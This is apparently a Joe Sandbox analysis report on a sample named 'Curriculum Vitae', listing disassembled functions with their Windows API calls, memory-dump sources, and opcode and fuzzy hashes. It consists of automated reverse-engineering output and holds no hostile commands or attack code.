                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(00000035), ref: 00D8F7B9
                      • SysAllocString.OLEAUT32(00000001), ref: 00D8F860
                      • VariantCopy.OLEAUT32(00D8FA64,00000000), ref: 00D8F889
                      • VariantClear.OLEAUT32(00D8FA64), ref: 00D8F8AD
                      • VariantCopy.OLEAUT32(00D8FA64,00000000), ref: 00D8F8B1
                      • VariantClear.OLEAUT32(?), ref: 00D8F8BB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearCopy$AllocInitString
                      • String ID:
                      • API String ID: 3859894641-0
                      • Opcode ID: f4b552a1e8d132de85aa93a23c9c85995cfbdd3fceb3163959aeabd47f6967a2
                      • Instruction ID: cfe685274745287c400b80c81ee56260499e3f962ec20af7992e045a5e224684
                      • Opcode Fuzzy Hash: f4b552a1e8d132de85aa93a23c9c85995cfbdd3fceb3163959aeabd47f6967a2
                      • Instruction Fuzzy Hash: 9851B076A10311BBCF24BB65D895B2DB3A8EF45310F249467E906DF292DB709C40CBB6
                      Function 00DA910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00DA94E5
                      • _wcslen.LIBCMT ref: 00DA9506
                      • _wcslen.LIBCMT ref: 00DA952D
                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00DA9585
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$FileName$OpenSave
                      • String ID: X
                      • API String ID: 83654149-3081909835
                      • Opcode ID: 6d1b82267e49f2864e9d0afe2a5d4c9992545e0469d30198efb65b9e3f231ee7
                      • Instruction ID: 26a356847f67644a4955e1592b4dbd153f531e1d3d1646b8eb7d1b6a934f1232
                      • Opcode Fuzzy Hash: 6d1b82267e49f2864e9d0afe2a5d4c9992545e0469d30198efb65b9e3f231ee7
                      • Instruction Fuzzy Hash: 8EE180715083409FDB24DF24C491A6AB7E4FF85314F18896DF8899B2A2DB71ED05CBB2
                      Function 00D4920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • BeginPaint.USER32(?,?,?), ref: 00D49241
                      • GetWindowRect.USER32(?,?), ref: 00D492A5
                      • ScreenToClient.USER32(?,?), ref: 00D492C2
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D492D3
                      • EndPaint.USER32(?,?,?,?,?), ref: 00D49321
                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D871EA
                        • Part of subcall function 00D49339: BeginPath.GDI32(00000000), ref: 00D49357
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                      • String ID:
                      • API String ID: 3050599898-0
                      • Opcode ID: 5a5bc58378a746600405a4a491443344b622da229aa1bb66815890bc3ee3ee8f
                      • Instruction ID: 358ba36eee39fbcd687b53f22e542863b9b2bc06e784f36ff6cb838fb418169b
                      • Opcode Fuzzy Hash: 5a5bc58378a746600405a4a491443344b622da229aa1bb66815890bc3ee3ee8f
                      • Instruction Fuzzy Hash: 78418030104301AFD711DF26DC99FABBBA8EB86320F140269FA949B2A1C7719845DB71
                      Function 00DA07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DA080C
                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DA0847
                      • EnterCriticalSection.KERNEL32(?), ref: 00DA0863
                      • LeaveCriticalSection.KERNEL32(?), ref: 00DA08DC
                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DA08F3
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DA0921
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                      • String ID:
                      • API String ID: 3368777196-0
                      • Opcode ID: 206a3cb00025375fd38fb47f89c6152d1041132da4ba9487c1fab40e9e8b11e0
                      • Instruction ID: 683aba9926ff1ab872cd8a3d5134ef7a9df1bbb07498aa1989a5970558885571
                      • Opcode Fuzzy Hash: 206a3cb00025375fd38fb47f89c6152d1041132da4ba9487c1fab40e9e8b11e0
                      • Instruction Fuzzy Hash: 4C415B71900206AFDF14AF64DC85A6ABBB8FF05300F1480A5ED04DA296D730DE55DBB4
                      Function 00DC81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                      Download Yara Rule
                      APIs
                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00D8F3AB,00000000,?,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00DC824C
                      • EnableWindow.USER32(00000000,00000000), ref: 00DC8272
                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DC82D1
                      • ShowWindow.USER32(00000000,00000004), ref: 00DC82E5
                      • EnableWindow.USER32(00000000,00000001), ref: 00DC830B
                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DC832F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      • Opcode ID: 2f438cbd79ae16e5b40b6058f845273390950000f4416acaaadb7f26824dbbd1
                      • Instruction ID: e9e79a9188652a47c8a70bdd764c613d89e34b555901f7069a12c572cb16c2aa
                      • Opcode Fuzzy Hash: 2f438cbd79ae16e5b40b6058f845273390950000f4416acaaadb7f26824dbbd1
                      • Instruction Fuzzy Hash: 0F41A330601646AFDB11CF15C899FA4BBE0FB4A715F1C52ADE5089F2B2CB32A845DF64
                      Function 00D94C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                      Download Yara Rule
                      APIs
                      • IsWindowVisible.USER32(?), ref: 00D94C95
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D94CB2
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D94CEA
                      • _wcslen.LIBCMT ref: 00D94D08
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D94D10
                      • _wcsstr.LIBVCRUNTIME ref: 00D94D1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                      • String ID:
                      • API String ID: 72514467-0
                      • Opcode ID: d7e5ac20e59077aa68260c17926df46dfe732f50e036a578beecf3efdf2e1cce
                      • Instruction ID: 1004ca358c663a8089d9c007b0b83e43fd177ee35519e15eec08507451b64114
                      • Opcode Fuzzy Hash: d7e5ac20e59077aa68260c17926df46dfe732f50e036a578beecf3efdf2e1cce
                      • Instruction Fuzzy Hash: 73210836604201BFEF255B39ED49E7B7B9CDF45750F148039F909CA2A2EA61DC4297B0
                      Function 00DA581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                      • _wcslen.LIBCMT ref: 00DA587B
                      • CoInitialize.OLE32(00000000), ref: 00DA5995
                      • CoCreateInstance.OLE32(00DCFCF8,00000000,00000001,00DCFB68,?), ref: 00DA59AE
                      • CoUninitialize.OLE32 ref: 00DA59CC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 3172280962-24824748
                      • Opcode ID: 0d046dfc786deaf14d01dd0ac77e8ecf0334b3d6169e3f03642570477959eb48
                      • Instruction ID: 00ae436e6441e3c75e4823c4f4c5bbab4f4036889dd2ba937c433d199bdea219
                      • Opcode Fuzzy Hash: 0d046dfc786deaf14d01dd0ac77e8ecf0334b3d6169e3f03642570477959eb48
                      • Instruction Fuzzy Hash: A1D142756087019FC714DF25D480A2ABBE1FF8A720F14885DF88A9B361DB31ED45CBA2
                      Function 00D9175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D90FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D90FCA
                        • Part of subcall function 00D90FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D90FD6
                        • Part of subcall function 00D90FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D90FE5
                        • Part of subcall function 00D90FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D90FEC
                        • Part of subcall function 00D90FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D91002
                      • GetLengthSid.ADVAPI32(?,00000000,00D91335), ref: 00D917AE
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D917BA
                      • HeapAlloc.KERNEL32(00000000), ref: 00D917C1
                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D917DA
                      • GetProcessHeap.KERNEL32(00000000,00000000,00D91335), ref: 00D917EE
                      • HeapFree.KERNEL32(00000000), ref: 00D917F5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                      • String ID:
                      • API String ID: 3008561057-0
                      • Opcode ID: e10e810215ab59ac5e4660922e0cf682ea5ed2f11e7cf2421fbf63cfa28f9347
                      • Instruction ID: cf3f7051f721f207a238959ca9fda266fa07291b1abbb5eeb164ee736eec9e50
                      • Opcode Fuzzy Hash: e10e810215ab59ac5e4660922e0cf682ea5ed2f11e7cf2421fbf63cfa28f9347
                      • Instruction Fuzzy Hash: 8E118636A10307EFDF109FA5CC49FAE7BA9EB41355F184018E586E7220C736A944CB70
                      Function 00D914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D914FF
                      • OpenProcessToken.ADVAPI32(00000000), ref: 00D91506
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D91515
                      • CloseHandle.KERNEL32(00000004), ref: 00D91520
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D9154F
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D91563
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: 86b6bbcaa4ae8c270cac1e7419b601a95c6afac9ab99d1f55572e0143799f640
                      • Instruction ID: 9e27deeab4f0b3c3b60bcad36feb47af9812ef63b0c02052a3de5bdce4faf4b7
                      • Opcode Fuzzy Hash: 86b6bbcaa4ae8c270cac1e7419b601a95c6afac9ab99d1f55572e0143799f640
                      • Instruction Fuzzy Hash: 8811177650024AABDF118F98ED49FDE7BA9FB48744F094015FA09A2160C375CE61AB70
                      Function 00D53382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,00D53379,00D52FE5), ref: 00D53390
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D5339E
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D533B7
                      • SetLastError.KERNEL32(00000000,?,00D53379,00D52FE5), ref: 00D53409
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: f1c9cfecf80f92e7dbe14654d81f8bea3e2a36fec1a951ff5ac789bac5d977c5
                      • Instruction ID: 9b35de3af4572315bf370a38cc21c54cb6f156830bbb67f8b42edd045e0ce741
                      • Opcode Fuzzy Hash: f1c9cfecf80f92e7dbe14654d81f8bea3e2a36fec1a951ff5ac789bac5d977c5
                      • Instruction Fuzzy Hash: 1D016832218312BFEE152774BC81A762A44DB113FB320422DFC10C52F0EF114D1E9578
                      Function 00D62D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,00D65686,00D73CD6,?,00000000,?,00D65B6A,?,?,?,?,?,00D5E6D1,?,00DF8A48), ref: 00D62D78
                      • _free.LIBCMT ref: 00D62DAB
                      • _free.LIBCMT ref: 00D62DD3
                      • SetLastError.KERNEL32(00000000,?,?,?,?,00D5E6D1,?,00DF8A48,00000010,00D34F4A,?,?,00000000,00D73CD6), ref: 00D62DE0
                      • SetLastError.KERNEL32(00000000,?,?,?,?,00D5E6D1,?,00DF8A48,00000010,00D34F4A,?,?,00000000,00D73CD6), ref: 00D62DEC
                      • _abort.LIBCMT ref: 00D62DF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: bad77322ad9015ebf6e7f32cebd96dce3c9c3663ad201966a3678692d75fb443
                      • Instruction ID: cf295b356fc179b68eae60e4b7cfb4defed7231c77952ea82155f629a5b34331
                      • Opcode Fuzzy Hash: bad77322ad9015ebf6e7f32cebd96dce3c9c3663ad201966a3678692d75fb443
                      • Instruction Fuzzy Hash: CFF0C831A44F0227C2122738BC16F7E2659EFC27B1F294419F968D22D6EF2488114AB0
                      Function 00DC8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D49693
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496A2
                        • Part of subcall function 00D49639: BeginPath.GDI32(?), ref: 00D496B9
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496E2
                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DC8A4E
                      • LineTo.GDI32(?,00000003,00000000), ref: 00DC8A62
                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DC8A70
                      • LineTo.GDI32(?,00000000,00000003), ref: 00DC8A80
                      • EndPath.GDI32(?), ref: 00DC8A90
                      • StrokePath.GDI32(?), ref: 00DC8AA0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                      • String ID:
                      • API String ID: 43455801-0
                      • Opcode ID: 50f6051d5973aba0ba706d04b7578e0fd5a8bc2976ba6ce44f0a150fd00927b9
                      • Instruction ID: 325c91af8ca3f18e6e0b0ccb0e70170cf04dab6cff67e5649c65d93733200136
                      • Opcode Fuzzy Hash: 50f6051d5973aba0ba706d04b7578e0fd5a8bc2976ba6ce44f0a150fd00927b9
                      • Instruction Fuzzy Hash: 57110C7640020AFFDF119F91DC48E9A7F6CEB04390F048055FA599A1A1C7719D55EF70
                      Function 00D951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 00D95218
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D95229
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D95230
                      • ReleaseDC.USER32(00000000,00000000), ref: 00D95238
                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D9524F
                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00D95261
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CapsDevice$Release
                      • String ID:
                      • API String ID: 1035833867-0
                      • Opcode ID: ecb7295af41e9bf53dcfa1c289c612dfd0b65814833812b8b8f581ead7722742
                      • Instruction ID: ad25514a3011e54b9e14840dd7175297862a47b83f1df849e5d6b027da85373c
                      • Opcode Fuzzy Hash: ecb7295af41e9bf53dcfa1c289c612dfd0b65814833812b8b8f581ead7722742
                      • Instruction Fuzzy Hash: 44014475A41716BBEF105BA59D49E5EBF78EF44751F084065FB08E7391D6709800CB70
                      Function 00D31BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D31BF4
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D31BFC
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D31C07
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D31C12
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D31C1A
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D31C22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: 20a0328a67821ee45d1474412dc62f00ce7221ed1a6a2f7b9b4ed43601391d88
                      • Instruction ID: 9a153ab505fcbb8a024032c1794f509fc830d566dc602ccd0aabf0d92f3792be
                      • Opcode Fuzzy Hash: 20a0328a67821ee45d1474412dc62f00ce7221ed1a6a2f7b9b4ed43601391d88
                      • Instruction Fuzzy Hash: 0C016CB094275A7DE3008F5A8C85B52FFA8FF19354F00411BD15C47A41C7F5A864CBE5
                      Function 00D9EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D9EB30
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D9EB46
                      • GetWindowThreadProcessId.USER32(?,?), ref: 00D9EB55
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D9EB64
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D9EB6E
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D9EB75
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
